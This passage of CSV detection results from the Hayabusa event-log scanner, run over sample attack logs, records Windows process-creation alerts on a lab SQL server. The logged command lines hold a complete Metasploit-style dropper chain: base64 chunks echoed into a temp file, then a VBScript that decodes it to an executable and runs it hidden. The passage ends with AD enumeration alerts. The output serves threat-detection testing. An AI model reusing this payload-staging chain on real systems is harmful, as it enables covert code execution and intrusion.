cz48dGggY29sc3Bhbj0yICVzPktlZXAtQWxpdmUgcmVxdWVzdHM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+Tm9uLTJ4eCByZXNwb25zZXM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVk
PC90ZD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49NCAlcyA+ICAgKENvbm5lY3Q6ICVkLCBMZW5ndGg6ICVkLCBFeGNlcHRpb25zOiAlZCk8L3RkPjwvdHI+CgAAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RmFpbGVkIHJlcXVlc3Rz>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 
07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = 
CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = 
""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx 2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 